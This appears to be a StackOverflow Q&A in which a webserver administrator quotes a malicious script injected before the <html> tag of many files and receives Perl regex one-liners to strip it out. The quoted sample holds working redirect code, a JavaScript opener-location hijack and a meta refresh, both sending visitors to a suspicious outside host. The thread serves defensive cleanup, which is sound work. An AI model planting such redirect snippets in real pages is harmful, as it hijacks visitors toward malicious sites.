1

A folder on a webserver I manage was recently infected, and a malicious script was placed before the opening <html> tag on a whole mess of files. I'm trying to execute a perl string replace script to clean it out.

The malicious files look something like this:

<script language="JavaScript">
parent.window.opener.location="http://vkk.coom.ny8pbpk.ru?nhzwhhh=ZE9taWlsX2nkPRE0LmZub3ffaUQ9PTM3MCbjb0RlNWFlZnrvaEx2b2JydWLuYUJxfwC%3D%3D";
</script>
<meta http-equiv="refresh" content="0;URL=http://yandex.ru.ny8pbpk.ru?pk=i%2FGWhteXsNcf0qzPwdiVgMkkhvrG1YbO25gYgPqe2saQmdIDmeiUlsiXmNEQmPCfhMSD5" />
<html>
<head>
......and the file goes on

I'm something of a mess with Regex, and I've tried to glean as much as I can from other StackOverflow posts on how to use perl's string replace. The biggest issue I'm running into is making it work over multiple lines.

Here's what I have so far:

perl -0777 -i -pe 's/\s*<html>/<html>/s' index.html    

This seems to have no effect. If I change the second <html> to <foobar> it correctly replaces with foobar, but it ignores everything in front of it.

From what I can tell, the -0777 flag is supposed to "slurp" as one line, and the \s* should match the entire string before <html>, but again, my regex is lacking. Any help is greatly appreciated!

3 Answers 3

2

Try this:

perl -0777 -i -pe 's/^.*(?=<html>)//s' index.html

or this more safer and effective pattern:

perl -0777 -i -pe 's/^(?>[^<]++|<(?!html>))*(?=<html>)//' index.html
Sign up to request clarification or add additional context in comments.

1 Comment

if the string '<html>' is not present in the infected part it's probably slightly safer to write s/^.*?(?=<html>)//s. This avoids deleting to much text if '<html>' is found somewhere in the body of the page (as in <p>Example of an html document:</p><pre><![CDATA[<html>blah blah...</html>]]></pre>). That's unlikely but who knows...
1

\s* is too specific. You don't only want to match whitespace before the . Try .* which matches everything before the

2 Comments

Thanks, this helped steer me onto the right track! The issue was that \s was only matching whitespaces. [\s\S] will match whitespace or non-whitespace, which is everything!
. (dot) does the same thing and is a more common pattern. Less code and what readers of your code are more likely to expect.
0

\s* should be [\s\S]* so it matches all characters.

I found this as a great reference: http://www.cs.tut.fi/~jkorpela/perl/regexp.html

So the final working command is:

perl -0777 -i -pe 's/[\s\S]*<html>/<html>/s' index.html

Comments

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.